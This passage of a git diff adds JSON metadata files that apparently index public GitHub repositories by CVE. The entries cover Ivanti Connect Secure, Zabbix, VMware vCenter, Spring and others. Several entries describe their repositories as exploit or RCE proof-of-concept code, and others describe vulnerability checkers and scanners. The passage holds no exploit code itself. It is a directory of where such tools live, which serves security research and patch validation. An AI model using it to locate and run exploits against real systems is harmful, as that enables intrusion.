"https:\/\/github.com\/hacefresko\/CVE-2024-2188", + "description": "Exploit for stored XSS vulnerability found in the TP-Link Archer AX50 router.", + "fork": false, + "created_at": "2024-09-17T14:33:13Z", + "updated_at": "2024-11-20T16:31:05Z", + "pushed_at": "2024-10-31T18:53:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21887.json b/2024/CVE-2024-21887.json new file mode 100644 index 0000000000..5d2f6ed132 --- /dev/null +++ b/2024/CVE-2024-21887.json @@ -0,0 +1,219 @@ +[ + { + "id": 743084274, + "name": "ivanti-CVE-2024-21887", + "full_name": "oways\/ivanti-CVE-2024-21887", + "owner": { + "login": "oways", + "id": 11142952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11142952?v=4", + "html_url": "https:\/\/github.com\/oways", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oways\/ivanti-CVE-2024-21887", + "description": "POC Checker for ivanti CVE-2024-21887 Command injcetion", + "fork": false, + "created_at": "2024-01-14T09:25:56Z", + "updated_at": "2024-05-10T02:50:53Z", + "pushed_at": "2024-01-14T09:27:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744186376, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "duy-31\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-46805_CVE-2024-21887", + "description": "An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.", + "fork": false, + "created_at": "2024-01-16T19:40:59Z", + "updated_at": "2024-10-31T11:53:58Z", + "pushed_at": "2024-01-17T19:14:09Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 744213825, + "name": "CVE-2024-21887", + "full_name": "Chocapikk\/CVE-2024-21887", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-21887", + "description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.", + "fork": false, + "created_at": "2024-01-16T20:59:38Z", + "updated_at": "2024-08-24T12:25:19Z", + "pushed_at": "2024-01-17T00:38:28Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 50, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 745015590, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "raminkarimkhani1996", + "id": 26582031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26582031?v=4", + "html_url": "https:\/\/github.com\/raminkarimkhani1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "description": "The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.", + "fork": false, + "created_at": "2024-01-18T13:25:46Z", + "updated_at": "2024-04-30T02:04:11Z", + "pushed_at": "2024-03-23T14:52:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745284788, + "name": "Ivanti-Connect-Around-Scan", + "full_name": "seajaysec\/Ivanti-Connect-Around-Scan", + "owner": { + "login": "seajaysec", + "id": 7016191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7016191?v=4", + "html_url": "https:\/\/github.com\/seajaysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seajaysec\/Ivanti-Connect-Around-Scan", + "description": "Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.", + "fork": false, + "created_at": "2024-01-19T02:12:11Z", + "updated_at": "2024-04-05T07:44:30Z", + "pushed_at": "2024-02-03T01:59:49Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745384269, + "name": "CVE-2023-46805_CVE-2024-21887_scan_grouped", + "full_name": "mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "owner": { + "login": "mickdec", + "id": 33021266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33021266?v=4", + "html_url": "https:\/\/github.com\/mickdec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "description": null, + "fork": false, + "created_at": "2024-01-19T08:11:31Z", + "updated_at": "2024-05-21T12:56:29Z", + "pushed_at": "2024-05-21T12:56:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745995423, + "name": "CVE-2024-21887", + "full_name": "tucommenceapousser\/CVE-2024-21887", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2024-21887", + "description": "exploit for ivanti", + "fork": false, + "created_at": "2024-01-20T19:15:23Z", + "updated_at": "2024-07-05T09:57:14Z", + "pushed_at": "2024-01-20T19:20:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21893.json b/2024/CVE-2024-21893.json new file mode 100644 index 0000000000..8c9be6edf5 --- /dev/null +++ b/2024/CVE-2024-21893.json @@ -0,0 +1,64 @@ +[ + { + "id": 752054404, + "name": "CVE-2024-21893.py", + "full_name": "h4x0r-dz\/CVE-2024-21893.py", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-21893.py", + "description": "CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure", + "fork": false, + "created_at": "2024-02-02T22:59:21Z", + "updated_at": "2024-11-14T22:33:31Z", + "pushed_at": "2024-02-02T23:27:10Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 92, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 752217325, + "name": "CVE-2024-21893-to-CVE-2024-21887", + "full_name": "Chocapikk\/CVE-2024-21893-to-CVE-2024-21887", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-21893-to-CVE-2024-21887", + "description": "CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit", + "fork": false, + "created_at": "2024-02-03T11:33:40Z", + "updated_at": "2024-09-27T09:59:10Z", + "pushed_at": "2024-02-03T11:48:37Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2193.json b/2024/CVE-2024-2193.json new file mode 100644 index 0000000000..eae142cba7 --- /dev/null +++ b/2024/CVE-2024-2193.json @@ -0,0 +1,33 @@ +[ + { + "id": 778680882, + "name": "CVE-2024-2193", + "full_name": "uthrasri\/CVE-2024-2193", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-2193", + "description": null, + "fork": false, + "created_at": "2024-03-28T07:30:04Z", + "updated_at": "2024-03-28T07:31:14Z", + "pushed_at": "2024-03-28T07:31:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21978.json b/2024/CVE-2024-21978.json new file mode 100644 index 0000000000..3d08e2a632 --- /dev/null +++ b/2024/CVE-2024-21978.json @@ -0,0 +1,33 @@ +[ + { + "id": 740045599, + "name": "cve-2024-21978-poc", + "full_name": "Freax13\/cve-2024-21978-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2024-21978-poc", + "description": null, + "fork": false, + "created_at": "2024-01-07T11:07:01Z", + "updated_at": "2024-09-17T06:51:21Z", + "pushed_at": "2024-09-17T06:51:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21980.json b/2024/CVE-2024-21980.json new file mode 100644 index 0000000000..4174037c95 --- /dev/null +++ b/2024/CVE-2024-21980.json @@ -0,0 +1,33 @@ +[ + { + "id": 741649413, + "name": "cve-2024-21980-poc", + "full_name": "Freax13\/cve-2024-21980-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2024-21980-poc", + "description": null, + "fork": false, + "created_at": "2024-01-10T20:35:38Z", + "updated_at": "2024-09-13T17:07:18Z", + "pushed_at": "2024-01-10T20:43:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22002.json b/2024/CVE-2024-22002.json new file mode 100644 index 0000000000..970680f5c7 --- /dev/null +++ b/2024/CVE-2024-22002.json @@ -0,0 +1,33 @@ +[ + { + "id": 738235829, + "name": "iCUE_DllHijack_LPE-CVE-2024-22002", + "full_name": "0xkickit\/iCUE_DllHijack_LPE-CVE-2024-22002", + "owner": { + "login": "0xkickit", + "id": 141216208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141216208?v=4", + "html_url": "https:\/\/github.com\/0xkickit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkickit\/iCUE_DllHijack_LPE-CVE-2024-22002", + "description": null, + "fork": false, + "created_at": "2024-01-02T18:49:21Z", + "updated_at": "2024-05-23T16:22:19Z", + "pushed_at": "2024-05-23T16:18:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22024.json b/2024/CVE-2024-22024.json new file mode 100644 index 0000000000..ff02f04f73 --- /dev/null +++ b/2024/CVE-2024-22024.json @@ -0,0 +1,33 @@ +[ + { + "id": 755152479, + "name": "CVE-2024-22024", + "full_name": "0dteam\/CVE-2024-22024", + "owner": { + "login": "0dteam", + "id": 56728081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56728081?v=4", + "html_url": "https:\/\/github.com\/0dteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0dteam\/CVE-2024-22024", + "description": "Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure", + "fork": false, + "created_at": "2024-02-09T14:31:56Z", + "updated_at": "2024-06-30T21:24:49Z", + "pushed_at": "2024-02-09T15:14:03Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22026.json b/2024/CVE-2024-22026.json new file mode 100644 index 0000000000..112118be7f --- /dev/null +++ b/2024/CVE-2024-22026.json @@ -0,0 +1,33 @@ +[ + { + "id": 800980981, + "name": "CVE-2024-22026", + "full_name": "securekomodo\/CVE-2024-22026", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/CVE-2024-22026", + "description": "Exploit POC for CVE-2024-22026 affecting Ivanti EPMM \"MobileIron Core\"", + "fork": false, + "created_at": "2024-05-15T11:20:45Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-15T11:40:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22120.json b/2024/CVE-2024-22120.json new file mode 100644 index 0000000000..d441ae282e --- /dev/null +++ b/2024/CVE-2024-22120.json @@ -0,0 +1,99 @@ +[ + { + "id": 803086886, + "name": "CVE-2024-22120-RCE", + "full_name": "W01fh4cker\/CVE-2024-22120-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-22120-RCE", + "description": "Time Based SQL Injection in Zabbix Server Audit Log --> RCE", + "fork": false, + "created_at": "2024-05-20T03:29:09Z", + "updated_at": "2024-10-29T13:04:39Z", + "pushed_at": "2024-05-21T10:30:49Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-22120", + "redteam", + "zabbix" + ], + "visibility": "public", + "forks": 22, + "watchers": 114, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842041393, + "name": "CVE-2024-22120-RCE-with-gopher", + "full_name": "isPique\/CVE-2024-22120-RCE-with-gopher", + "owner": { + "login": "isPique", + "id": 139041426, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139041426?v=4", + "html_url": "https:\/\/github.com\/isPique", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isPique\/CVE-2024-22120-RCE-with-gopher", + "description": "This is my exploit for CVE-2024-22120, which involves an SSRF vulnerability inside an XXE with a Gopher payload.", + "fork": false, + "created_at": "2024-08-13T14:51:44Z", + "updated_at": "2024-11-18T20:54:20Z", + "pushed_at": "2024-08-13T14:56:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 842565397, + "name": "CVE-2024-22120-RCE-with-gopher", + "full_name": "g4nkd\/CVE-2024-22120-RCE-with-gopher", + "owner": { + "login": "g4nkd", + "id": 150204934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150204934?v=4", + "html_url": "https:\/\/github.com\/g4nkd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g4nkd\/CVE-2024-22120-RCE-with-gopher", + "description": "This exploit was created to exploit an XXE (XML External Entity). Through it, I read the backend code of the web service and found an endpoint where I could use gopher to make internal requests on Zabbix vulnerable to RCE.", + "fork": false, + "created_at": "2024-08-14T15:55:33Z", + "updated_at": "2024-08-24T08:17:46Z", + "pushed_at": "2024-08-15T09:55:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22145.json b/2024/CVE-2024-22145.json new file mode 100644 index 0000000000..57c9193d02 --- /dev/null +++ b/2024/CVE-2024-22145.json @@ -0,0 +1,38 @@ +[ + { + "id": 744705693, + "name": "CVE-2024-22145", + "full_name": "RandomRobbieBF\/CVE-2024-22145", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-22145", + "description": "InstaWP Connect <= 0.1.0.8 - Missing Authorization to Arbitrary Options Update (Subscriber+)", + "fork": false, + "created_at": "2024-01-17T20:56:21Z", + "updated_at": "2024-07-11T16:39:44Z", + "pushed_at": "2024-01-17T20:59:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-22145", + "exploit", + "instawp-connect", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22198.json b/2024/CVE-2024-22198.json new file mode 100644 index 0000000000..a62b1970f5 --- /dev/null +++ b/2024/CVE-2024-22198.json @@ -0,0 +1,36 @@ +[ + { + "id": 833176749, + "name": "CVE-2024-22198_Checker", + "full_name": "xiw1ll\/CVE-2024-22198_Checker", + "owner": { + "login": "xiw1ll", + "id": 69167284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69167284?v=4", + "html_url": "https:\/\/github.com\/xiw1ll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiw1ll\/CVE-2024-22198_Checker", + "description": "Identify Nginx-ui version and check if it's vulnerable to CVE-2024-22198", + "fork": false, + "created_at": "2024-07-24T13:59:51Z", + "updated_at": "2024-08-05T08:46:39Z", + "pushed_at": "2024-07-24T14:02:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2024-22198" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22243.json b/2024/CVE-2024-22243.json new file mode 100644 index 0000000000..7d347641c7 --- /dev/null +++ b/2024/CVE-2024-22243.json @@ -0,0 +1,76 @@ +[ + { + "id": 761209664, + "name": "CVE-2024-22243", + "full_name": "SeanPesce\/CVE-2024-22243", + "owner": { + "login": "SeanPesce", + "id": 20076909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20076909?v=4", + "html_url": "https:\/\/github.com\/SeanPesce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeanPesce\/CVE-2024-22243", + "description": "Example exploitable scenarios for CVE-2024-22243 affecting the Spring framework (open redirect & SSRF).", + "fork": false, + "created_at": "2024-02-21T12:55:22Z", + "updated_at": "2024-11-25T20:55:53Z", + "pushed_at": "2024-10-22T16:37:42Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "cve-2024-22243", + "java", + "open-redirect", + "server-side-request-forgery", + "spring", + "ssrf", + "uri", + "url", + "vulnerability", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762214516, + "name": "CVE-2024-22243-CVE-2024-22234", + "full_name": "shellfeel\/CVE-2024-22243-CVE-2024-22234", + "owner": { + "login": "shellfeel", + "id": 18633010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18633010?v=4", + "html_url": "https:\/\/github.com\/shellfeel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellfeel\/CVE-2024-22243-CVE-2024-22234", + "description": " env of CVE-2024-22243&CVE-2024-22234", + "fork": false, + "created_at": "2024-02-23T10:09:51Z", + "updated_at": "2024-05-16T01:31:27Z", + "pushed_at": "2024-02-28T06:55:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22262.json b/2024/CVE-2024-22262.json new file mode 100644 index 0000000000..c402f06e2d --- /dev/null +++ b/2024/CVE-2024-22262.json @@ -0,0 +1,33 @@ +[ + { + "id": 891146409, + "name": "CVE-2024-22262", + "full_name": "Performant-Labs\/CVE-2024-22262", + "owner": { + "login": "Performant-Labs", + "id": 35463594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35463594?v=4", + "html_url": "https:\/\/github.com\/Performant-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Performant-Labs\/CVE-2024-22262", + "description": null, + "fork": false, + "created_at": "2024-11-19T20:08:57Z", + "updated_at": "2024-11-22T17:56:59Z", + "pushed_at": "2024-11-22T17:56:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22263.json b/2024/CVE-2024-22263.json new file mode 100644 index 0000000000..bb7291b3fc --- /dev/null +++ b/2024/CVE-2024-22263.json @@ -0,0 +1,33 @@ +[ + { + "id": 845723051, + "name": "CVE-2024-22263_Scanner", + "full_name": "securelayer7\/CVE-2024-22263_Scanner", + "owner": { + "login": "securelayer7", + "id": 14994455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14994455?v=4", + "html_url": "https:\/\/github.com\/securelayer7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securelayer7\/CVE-2024-22263_Scanner", + "description": "(CVE-2024-22263) Spring Cloud Dataflow Arbitrary File Writing Scanner", + "fork": false, + "created_at": "2024-08-21T19:58:25Z", + "updated_at": "2024-10-02T05:55:18Z", + "pushed_at": "2024-08-21T20:08:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22274.json b/2024/CVE-2024-22274.json new file mode 100644 index 0000000000..f774683c55 --- /dev/null +++ b/2024/CVE-2024-22274.json @@ -0,0 +1,144 @@ +[ + { + "id": 825079199, + "name": "CVE-2024-22274", + "full_name": "mbadanoiu\/CVE-2024-22274", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-22274", + "description": "CVE-2024-22274: Authenticated Remote Code Execution in VMware vCenter Server", + "fork": false, + "created_at": "2024-07-06T17:55:25Z", + "updated_at": "2024-11-25T15:44:57Z", + "pushed_at": "2024-07-06T18:10:20Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2024-22274", + "cves", + "remote-code-execution" + ], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827123627, + "name": "CVE-2024-22274", + "full_name": "ninhpn1337\/CVE-2024-22274", + "owner": { + "login": "ninhpn1337", + "id": 26117234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26117234?v=4", + "html_url": "https:\/\/github.com\/ninhpn1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ninhpn1337\/CVE-2024-22274", + "description": null, + "fork": false, + "created_at": "2024-07-11T04:13:59Z", + "updated_at": "2024-07-11T04:19:52Z", + "pushed_at": "2024-07-11T04:19:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 828815621, + "name": "CVE-2024-22274-RCE", + "full_name": "l0n3m4n\/CVE-2024-22274-RCE", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-22274-RCE", + "description": "PoC - Authenticated Remote Code Execution in VMware vCenter Server (Exploit)", + "fork": false, + "created_at": "2024-07-15T07:26:59Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-16T23:22:14Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "ctf-challenges", + "exploit", + "pentesting", + "proof-of-concept", + "python", + "redteaming", + "vmware", + "vmware-vcenter", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830366409, + "name": "CVE-2024-22274-RCE", + "full_name": "Mustafa1986\/CVE-2024-22274-RCE", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2024-22274-RCE", + "description": null, + "fork": false, + "created_at": "2024-07-18T06:18:57Z", + "updated_at": "2024-07-18T10:12:25Z", + "pushed_at": "2024-07-18T10:12:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22275.json b/2024/CVE-2024-22275.json new file mode 100644 index 0000000000..055a836271 --- /dev/null +++ b/2024/CVE-2024-22275.json @@ -0,0 +1,40 @@ +[ + { + "id": 825084431, + "name": "CVE-2024-22275", + "full_name": "mbadanoiu\/CVE-2024-22275", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + 